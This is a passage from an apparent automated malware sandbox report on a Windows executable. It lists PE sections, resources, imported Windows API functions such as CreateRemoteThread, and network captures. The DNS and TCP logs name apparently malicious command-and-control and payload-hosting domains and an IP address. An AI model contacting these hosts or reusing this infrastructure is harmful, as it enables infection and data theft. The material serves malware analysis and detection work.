                                                                                  .rsrc0x1500000x83b80x8400False0.597005208333data5.81594555385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1590000x465a0x4800False0.346625434028data3.69106106097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  AFX_DIALOG_LAYOUT0x156ce80x2dataDutchNetherlands
                                                                                  AFX_DIALOG_LAYOUT0x156ce00x2dataDutchNetherlands
                                                                                  AFX_DIALOG_LAYOUT0x156cf00x2dataDutchNetherlands
                                                                                  AFX_DIALOG_LAYOUT0x156cf80x2dataDutchNetherlands
                                                                                  CIDAFICUDUROSOTAROM0x1565c80x6c7ASCII text, with very long lines, with no line terminatorsSpanishColombia
                                                                                  RT_CURSOR0x156d000x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                  RT_ICON0x1506e00x6c8dataSpanishColombia
                                                                                  RT_ICON0x150da80x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                  RT_ICON0x1513100x10a8dataSpanishColombia
                                                                                  RT_ICON0x1523b80x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                  RT_ICON0x152d400x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                  RT_ICON0x1531f80x8a8dataSpanishColombia
                                                                                  RT_ICON0x153aa00x6c8dataSpanishColombia
                                                                                  RT_ICON0x1541680x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                  RT_ICON0x1546d00x10a8dataSpanishColombia
                                                                                  RT_ICON0x1557780x988dataSpanishColombia
                                                                                  RT_ICON0x1561000x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                  RT_STRING0x1575c00xe4dataDutchNetherlands
                                                                                  RT_STRING0x1576a80x3a8dataDutchNetherlands
                                                                                  RT_STRING0x157a500x6e6dataDutchNetherlands
                                                                                  RT_STRING0x1581380x1a0dataDutchNetherlands
                                                                                  RT_STRING0x1582d80xdcdataDutchNetherlands
                                                                                  RT_ACCELERATOR0x156ca00x10dataDutchNetherlands
                                                                                  RT_ACCELERATOR0x156c900x10dataDutchNetherlands
                                                                                  RT_GROUP_CURSOR0x1575a80x14dataDutchNetherlands
                                                                                  RT_GROUP_ICON0x1531a80x4cdataSpanishColombia
                                                                                  RT_GROUP_ICON0x1565680x5adataSpanishColombia
                                                                                  None0x156cc00xadataDutchNetherlands
                                                                                  None0x156cd00xadataDutchNetherlands
                                                                                  None0x156cb00xadataDutchNetherlands

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllCallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthW, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeW, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, GetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetDriveTypeA, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, GetConsoleMode, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBA, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetNumberOfConsoleInputEvents, GetModuleHandleW, WriteConsoleOutputCharacterA, HeapFree, OpenMutexW, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetProcessVersion, lstrcpynA, GetNamedPipeInfo, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  DutchNetherlands
                                                                                  SpanishColombia

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 14, 2022 09:24:58.797563076 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.814989090 CET80497718.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:58.815146923 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.815263033 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.816153049 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.832624912 CET80497718.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:58.833401918 CET80497718.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:58.940293074 CET80497718.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:58.940399885 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.941262960 CET4977180192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:58.958657980 CET80497718.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.284614086 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.302115917 CET80497728.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.302324057 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.302438021 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.302463055 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.319987059 CET80497728.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.445801020 CET80497728.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.445892096 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.445961952 CET4977280192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.463897943 CET80497728.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.475713968 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.493649006 CET80497738.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.493765116 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.493870974 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.493884087 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.511320114 CET80497738.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.614084959 CET80497738.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.614232063 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.614471912 CET4977380192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.633616924 CET80497738.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.907728910 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.926353931 CET80497748.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.930547953 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.930694103 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.932509899 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:24:59.948623896 CET80497748.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:24:59.949959993 CET80497748.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.052834988 CET80497748.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.053014040 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.053267002 CET4977480192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.070507050 CET80497748.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.082914114 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.100903034 CET80497758.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.100996017 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.101351976 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.101387024 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.118777990 CET80497758.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.221487999 CET80497758.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.224498034 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.250431061 CET4977580192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.268131018 CET80497758.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.278577089 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.296108007 CET80497768.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.296245098 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.296350956 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.297825098 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.313702106 CET80497768.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.315283060 CET80497768.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.418025970 CET80497768.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.418343067 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.418565035 CET4977680192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:00.426628113 CET4977780192.168.2.4185.186.142.166
                                                                                  Jan 14, 2022 09:25:00.435934067 CET80497768.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.483220100 CET8049777185.186.142.166192.168.2.4
                                                                                  Jan 14, 2022 09:25:00.985346079 CET4977780192.168.2.4185.186.142.166
                                                                                  Jan 14, 2022 09:25:01.042015076 CET8049777185.186.142.166192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.547843933 CET4977780192.168.2.4185.186.142.166
                                                                                  Jan 14, 2022 09:25:01.604538918 CET8049777185.186.142.166192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.666572094 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.684102058 CET80497788.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.684206963 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.684281111 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.684849977 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.701833010 CET80497788.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.702070951 CET80497788.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.809964895 CET80497788.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.810058117 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.810340881 CET4977880192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.828099012 CET80497788.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.841980934 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.859357119 CET80497798.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.859595060 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.859750986 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.859767914 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.877048969 CET80497798.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.877120972 CET80497798.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.980530024 CET80497798.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:01.980627060 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.980865002 CET4977980192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:01.998287916 CET80497798.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.298381090 CET4978080192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:02.315738916 CET80497808.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.315850019 CET4978080192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:02.315969944 CET4978080192.168.2.48.209.70.0
                                                                                  Jan 14, 2022 09:25:02.376662016 CET80497808.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.418742895 CET80497808.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.418781996 CET80497808.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.418800116 CET80497808.209.70.0192.168.2.4
                                                                                  Jan 14, 2022 09:25:02.418817997 CET80497808.209.70.0192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Jan 14, 2022 09:24:58.504261971 CET192.168.2.48.8.8.80x85fbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:58.950818062 CET192.168.2.48.8.8.80x61cbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.455101967 CET192.168.2.48.8.8.80x35d0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.623431921 CET192.168.2.48.8.8.80x9b0aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.062973976 CET192.168.2.48.8.8.80x5fa1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.258764029 CET192.168.2.48.8.8.80xd8c1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.648228884 CET192.168.2.48.8.8.80xe4b6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.821270943 CET192.168.2.48.8.8.80x8084Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.988954067 CET192.168.2.48.8.8.80x92dfStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.468344927 CET192.168.2.48.8.8.80x133bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.640755892 CET192.168.2.48.8.8.80x824aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.106497049 CET192.168.2.48.8.8.80x4276Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.744245052 CET192.168.2.48.8.8.80xe630Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.910893917 CET192.168.2.48.8.8.80x2f13Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.375499964 CET192.168.2.48.8.8.80x6231Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.536884069 CET192.168.2.48.8.8.80xdf03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.966842890 CET192.168.2.48.8.8.80xc429Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.441303968 CET192.168.2.48.8.8.80x1c71Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.610197067 CET192.168.2.48.8.8.80xdf90Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.781980991 CET192.168.2.48.8.8.80x9e69Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.059603930 CET192.168.2.48.8.8.80x36a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.232727051 CET192.168.2.48.8.8.80x93a7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.402065992 CET192.168.2.48.8.8.80xbaacStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.569469929 CET192.168.2.48.8.8.80x8806Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.421874046 CET192.168.2.48.8.8.80x90ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.614980936 CET192.168.2.48.8.8.80xfe69Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.780625105 CET192.168.2.48.8.8.80x9cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.975579023 CET192.168.2.48.8.8.80xa24eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.770625114 CET192.168.2.48.8.8.80x73edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.948978901 CET192.168.2.48.8.8.80xcf20Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:17.118690014 CET192.168.2.48.8.8.80x702fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.734503031 CET192.168.2.48.8.8.80xaa98Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.404217958 CET192.168.2.48.8.8.80x571Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.500076056 CET192.168.2.48.8.8.80xe74cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.686891079 CET192.168.2.48.8.8.80x7390Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.855894089 CET192.168.2.48.8.8.80x8cdcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.023346901 CET192.168.2.48.8.8.80xffa9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.190979004 CET192.168.2.48.8.8.80xfc72Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.357533932 CET192.168.2.48.8.8.80x3b0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.527564049 CET192.168.2.48.8.8.80x920Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.692435980 CET192.168.2.48.8.8.80x24e6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.905060053 CET192.168.2.48.8.8.80x4803Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.069976091 CET192.168.2.48.8.8.80x5683Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.237016916 CET192.168.2.48.8.8.80xf82aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.408840895 CET192.168.2.48.8.8.80x3a0dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.596249104 CET192.168.2.48.8.8.80x19d5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.764209986 CET192.168.2.48.8.8.80x2a54Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.216681957 CET192.168.2.48.8.8.80xb533Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.395333052 CET192.168.2.48.8.8.80xf8e5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.580280066 CET192.168.2.48.8.8.80x709aStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.040406942 CET192.168.2.48.8.8.80x2e9cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.207436085 CET192.168.2.48.8.8.80x4d69Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.357714891 CET192.168.2.48.8.8.80x7264Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.525964975 CET192.168.2.48.8.8.80x4cdbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.691128969 CET192.168.2.48.8.8.80xec9aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.881808043 CET192.168.2.48.8.8.80x4146Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:46.060853004 CET192.168.2.48.8.8.80x3909Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:48.854824066 CET192.168.2.48.8.8.80x387Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.086039066 CET192.168.2.48.8.8.80xe7dcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.422725916 CET192.168.2.48.8.8.80x9abcStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.660095930 CET192.168.2.48.8.8.80x6f10Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.825428963 CET192.168.2.48.8.8.80x450bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:51.017307043 CET192.168.2.48.8.8.80xc9d6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:55.965636969 CET192.168.2.48.8.8.80x9c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.136208057 CET192.168.2.48.8.8.80xbfd2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.302062988 CET192.168.2.48.8.8.80x9b36Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.494359016 CET192.168.2.48.8.8.80xa220Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.717469931 CET192.168.2.48.8.8.80xe9f1Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.268810034 CET192.168.2.48.8.8.80x327Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.440820932 CET192.168.2.48.8.8.80xd067Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.614178896 CET192.168.2.48.8.8.80x6ba5Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.254791021 CET192.168.2.48.8.8.80x56c5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.447556973 CET192.168.2.48.8.8.80xd10bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.803284883 CET192.168.2.48.8.8.80x33c6Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.037647009 CET192.168.2.48.8.8.80x8385Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.210942030 CET192.168.2.48.8.8.80xcd06Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.423469067 CET192.168.2.48.8.8.80x5a80Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.783442020 CET192.168.2.48.8.8.80x6be3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.954782009 CET192.168.2.48.8.8.80x21fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:18.736825943 CET192.168.2.48.8.8.80xe7c1Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.934835911 CET192.168.2.48.8.8.80x8983Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:27:08.800683975 CET192.168.2.48.8.8.80x62ddStandard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jan 14, 2022 09:24:58.794605017 CET8.8.8.8192.168.2.40x85fbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.283950090 CET8.8.8.8192.168.2.40x61cbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.474836111 CET8.8.8.8192.168.2.40x35d0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:24:59.906702042 CET8.8.8.8192.168.2.40x9b0aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.082065105 CET8.8.8.8192.168.2.40x5fa1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:00.275962114 CET8.8.8.8192.168.2.40xd8c1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
